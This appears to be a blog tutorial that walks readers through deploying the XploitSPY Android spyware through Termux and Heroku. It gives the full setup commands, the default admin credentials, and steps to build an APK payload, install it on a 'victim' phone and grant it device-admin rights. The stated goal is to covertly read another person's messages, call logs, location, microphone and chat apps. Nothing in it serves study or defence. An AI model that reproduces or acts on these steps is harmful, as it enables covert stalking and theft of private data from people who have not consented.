Hello guys, today in this tutorial I am going to teach another Termux Tools . how to use Xploitspy an advanced Tool to Hack Someone Android phone
Now Xploitspy is fully Updated and Working properly, that’s why i decided to post an article on it
So let’s see how you can use this Xploitspy Tool to create payloads and spy on any Android’s smartphone.
How to use Xploitspy Tool
Let’s see some features of this tool.
You can Remotely do the following
- View Call Log
- View/Send Messages
- View Contacts of victim
- Get exact Location of Device
- File Explorer & Downloader
- Microphone Records
- View WiFi Networks
- Live Clipboard Logging
- View Installed Apps
- Monitor Skype/Telegram
- App Auto Hide
- See Whatsapp Chat, Instagram and other apps
And many other features
How to setup Xploitspy Using Termux
To use this Tool we are going to use Termux App, this is one-time use only, after that there is no use of Termux, you can do all the monitoring stuff from browser
Carefully follow these steps to get started.
Firstly We Need an
- Heroku Account (Free)
- Termux App from playstore
Create a Heroku Account
Heroku is a Cloud Hosting Platform, which we are taking advantage of its free hosting to host our Apps
Firstly go to https://heroku.com
And Create a free account
After that, we have to create an app,
Goto https://dashboard.heroku.com
Then click on New then click on Create app options
Now you have to give a random name to the app and proceed by clicking Create
Now you’re done, Remember the app name we will need it
Installing Xploitspy Tool in Termux
Now it’s time to use Termux,
Firstly Download Termux App from Playstore if it is not downloaded
Open Termux and Type the Commands one by one in it
apt update && apt upgrade
Then type this
pkg install git
Then Type.
pkg install nodejs
Now type.
npm install -g heroku
Then thai
git clone https://github.com/XploitWizer/XploitSPY.git
Then .
cd XploitSPY
Then.
heroku login -i
Now you have to provide your heroku login details in app
In the username type your email
And it will ask for the password, so type your heroku password and hit enter.
Now type these commands one by one
heroku git:remote -a App-Name
Here put App-Name
which you have chosen during app creation at heroku.com
Now type this
heroku buildpacks:add heroku/jvm
Then it
heroku buildpacks:add heroku/nodejs
And Final command is
git push heroku master
After some time it shows this successful message
Now we are ready to use Xploitspy Tool
Just open yourappname.herokuapp.com on any web browser
eg: I have choosen my app name as basuxxx
So I will open basuxxx.herokuapp.com
Click on Login option
The default username Password are
Username: admin
Password: password
After login, you will get dashboard,
To create an apk payload just click on ApK Builder and Download the payload Apk
After that install this apk in your victim device and give device admin access
After clicking on device, and select the device, you will see the following options
Now you’re able to spy on that device
Hope you like this tutorial, if you have any questions feel free to comment below